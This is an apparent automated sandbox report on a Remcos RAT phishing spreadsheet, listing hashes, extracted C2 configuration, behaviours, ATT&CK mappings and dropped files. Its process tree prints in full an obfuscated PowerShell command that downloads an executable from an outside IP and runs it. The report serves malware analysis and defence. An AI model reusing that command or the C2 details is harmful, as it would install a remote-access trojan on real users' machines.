remcos | c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c

Analysis

max time kernel
147s
max time network
151s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
26-07-2024 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quotation.xls
Size

1.1MB
MD5

36cace5745dcb32c2ab03ca4ba433394
SHA1

2e479ac4ea9b158f39093dded3b55c360a1f2082
SHA256

c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c
SHA512

e2dd193741bb1f9afc3a954bba2ee75a4df1797a487366ad8577a23366f87cb946957f258ab5b493b15abcf351da294e1bca8780765c855ad9a72aed4ed058af
SSDEEP

24576:d29iKjVBuNCgP4G2ycKiEb+S81doGvdKLQy2H7T1:0UKjVBuND4G2ciEb+SNIdOh

Score

10^/10

remcos gasplant defense_evasion discovery execution phishing rat

Malware Config

Extracted

Family

remcos

Botnet

Gasplant

unifrieghtmovers.com:2558

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
chrome-E2SMAR
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	2328	mshta.exe
9	2328	mshta.exe
11	1320	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2580	cmd.exe
1320	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
748	winiti.exe

Loads dropped DLL 1 IoCs

pid	Process
1320	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 748 set thread context of 2832	748	winiti.exe	40

Detected phishing page
phishing
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1480	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1320	powershell.exe
1320	powershell.exe
1320	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1320	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1480	EXCEL.EXE
1480	EXCEL.EXE
1480	EXCEL.EXE
1480	EXCEL.EXE
1480	EXCEL.EXE
1480	EXCEL.EXE
1480	EXCEL.EXE

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2580	2328	mshta.exe	31
PID 2328 wrote to memory of 2580	2328	mshta.exe	31
PID 2328 wrote to memory of 2580	2328	mshta.exe	31
PID 2328 wrote to memory of 2580	2328	mshta.exe	31
PID 2580 wrote to memory of 1320	2580	cmd.exe	34
PID 2580 wrote to memory of 1320	2580	cmd.exe	34
PID 2580 wrote to memory of 1320	2580	cmd.exe	34
PID 2580 wrote to memory of 1320	2580	cmd.exe	34
PID 1320 wrote to memory of 2624	1320	powershell.exe	35
PID 1320 wrote to memory of 2624	1320	powershell.exe	35
PID 1320 wrote to memory of 2624	1320	powershell.exe	35
PID 1320 wrote to memory of 2624	1320	powershell.exe	35
PID 2624 wrote to memory of 2108	2624	csc.exe	36
PID 2624 wrote to memory of 2108	2624	csc.exe	36
PID 2624 wrote to memory of 2108	2624	csc.exe	36
PID 2624 wrote to memory of 2108	2624	csc.exe	36
PID 1320 wrote to memory of 748	1320	powershell.exe	37
PID 1320 wrote to memory of 748	1320	powershell.exe	37
PID 1320 wrote to memory of 748	1320	powershell.exe	37
PID 1320 wrote to memory of 748	1320	powershell.exe	37
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 1932	748	winiti.exe	39
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40
PID 748 wrote to memory of 2832	748	winiti.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1480

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sh9uwsnq.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2624
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91B6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC91B5.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2108
  - - C:\Users\Admin\AppData\Roaming\winiti.exe
      "C:\Users\Admin\AppData\Roaming\winiti.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        5⤵
        
        PID:1932
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\gdfvr[1].hta

Filesize
8KB

MD5
3acfbfa9370584918cf3cac2f8c2477a

SHA1
00638f3a9f38d86ee353bcf781071d57f56a9bf9

SHA256
6a61d87c3dcddc622f054e9ff4628e74d983b7d90f32089b0ee09512a043fb05

SHA512
96f3f5f439dd90c0c012699961f7598b05937bb26ae3e55474da4540d14a467cd6b17adc8326e38346d75a92a8844fa592128fdd768a1f14e74ce899f92f2c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES91B6.tmp

Filesize
1KB

MD5
7c7a91071b54cd5629eb834c69bbf6cf

SHA1
e4c36a5ca5c0616488ce0c3d39e6d7c9d4bbc00e

SHA256
e38b9032b5a2e6a7f307faf83a26ecd8a5368ebf6917719ae289008d551bd8e2

SHA512
02543e7ffbd9d10bb321541e714893cec67877935b5a7ef019e41b1ebbc75b9a73df90e62ed4a192bb77e8534cf5107e2f1727d2f6cc10daf5ea2fd94f73cf4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\sh9uwsnq.dll

Filesize
3KB

MD5
275aac286660f6ef901d37d94bec9b95

SHA1
917c47f709b416c2a536397f0c10c89ddce49cb4

SHA256
c2e4f70b113d5ec0ae252edcbaf22d7f71c25a8b0bee751c8cc20dd9217cf349

SHA512
baa47740783c42c277335e53559532436b69152c204e8ed6b3cccc6f417ed0ec03c9068b0a2a269ac483dd65c619f91448e2f090f9669fb35c79300f079de90f

Download Submit
C:\Users\Admin\AppData\Local\Temp\sh9uwsnq.pdb

Filesize
7KB

MD5
53c5f1716d322345465b29ed5056628a

SHA1
91774dbe7b7b53d3796da9e2502661b452c6b37a

SHA256
bcf743759018d8d4c8f5f9c5d00430be6add3ce36bf92235c3d68f9ff4e6df2c

SHA512
8c6babe5341577991477bd29cf77f500dff9ee5b725ee8539135545380fc526ee11f04312b43c120c7fc54d60a518947f9bee8bb52cee8d16e32f143d6945fb2

Download Submit
C:\Users\Admin\AppData\Roaming\winiti.exe

Filesize
2.5MB

MD5
4fb3e6e7b8f9c12cd2d5e161f7b94760

SHA1
57bdad62c6ea7f1b905c900302f918d185811a94

SHA256
f76f9b85df2ba8850bec058164d2c752c8fd8ef0f1bcffd793e5f453d8a839bb

SHA512
f762ad1ccd537d06c1cf3538e433671f441f100b06d37ec34b3a3e76dfbfad40ac7ca50ee32297c54f628b0b89d75c2c5255166cc992f9bcff8f117f70aa179a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC91B5.tmp

Filesize
652B

MD5
ae1ad970061631ef4ee66a00f257a1dc

SHA1
c63e95076f6bc1fb38c578c014cb95a6070d16bb

SHA256
8e17a78ce1a90d4de2024eb7de99e427f55c60453e64118611aec94fa015a9fa

SHA512
2a9325cb9cc792a359002c84b72133f075f8c62e86714bf5edf53f525a6c00c0ecb90e2c14c06eaf9e92aa87ae18553c40ff487f0d7690a8c5e9301cf5933f87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sh9uwsnq.0.cs

Filesize
456B

MD5
d92562bb10c45a8479c6f2ca27d4aad2

SHA1
bf719a03faf19275b3b660779eb3cfdbda6d4ed5

SHA256
3d8e3a49c0baade4d70a96b0bc4c30053324aaf4564edac2fc547aa1ad123a83

SHA512
4c8fddb52b3032872eeb96da904ae6040ccf542526be4daf53ebdab975dc9400b38d0153dda5dd0da4d1d372f2711d6617be05f6b7208cb46603fc6f1c95dc39

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sh9uwsnq.cmdline

Filesize
309B

MD5
0263cb0f98175d6c7b6f08ffbe398447

SHA1
5bd15c76bb428e3bcc0ebbd76a7d8f75f45a4483

SHA256
929425610045dccefb95408d96a9fa5687ba866f78d5a943e6e295115df32744

SHA512
8d3be9a2f72cc6a630d094f0d0d901a7dd00ac84f020ed54a7f27fc05608b2d21913f7c63e85809e23be98bb4ea34233491568d9a16e7a52c957c64cd6c5f513

Download Submit
memory/1480-45-0x000000007244D000-0x0000000072458000-memory.dmp

Filesize
44KB

Download
memory/1480-4-0x0000000002F20000-0x0000000002F22000-memory.dmp

Filesize
8KB

Download
memory/1480-1-0x000000007244D000-0x0000000072458000-memory.dmp

Filesize
44KB

Download
memory/1480-54-0x000000007244D000-0x0000000072458000-memory.dmp

Filesize
44KB

Download
memory/1480-51-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1480-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2328-3-0x0000000001F20000-0x0000000001F22000-memory.dmp

Filesize
8KB

Download
memory/2832-38-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-40-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-41-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-42-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-39-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-46-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-47-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-48-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-37-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-36-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-55-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-56-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-57-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2832-58-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download